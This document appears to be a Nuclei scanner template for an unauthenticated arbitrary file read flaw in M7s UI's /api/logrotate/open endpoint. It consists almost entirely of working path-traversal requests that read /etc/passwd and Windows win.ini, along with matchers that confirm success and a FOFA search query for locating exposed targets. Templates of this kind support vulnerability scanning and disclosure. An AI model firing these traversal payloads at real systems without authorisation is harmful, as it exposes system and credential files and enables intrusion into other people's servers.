http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - root:x:0
            - /bin/false
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - "GET /api/logrotate/open?file=../../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}} \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\n"
    - matchers:
        - part: body
          type: word
          words:
            - ; for 16-bit app support
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - "GET /api/logrotate/open?file=../C://Windows/win.ini HTTP/1.1\nHost: {{Hostname}} \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\n"
id: M7s-UI-open-File-reading
info:
    author: Superhero
    description: |-
        fofa: body="static/js/chunk-libs.9540f991.js"
        M7s UI /api/logrotate/open 接口处任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: M7s UI /api/logrotate/open 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s/V69Ph44-Ffo-fdwrFIgCNA
    severity: high
    tags:
        - File reading
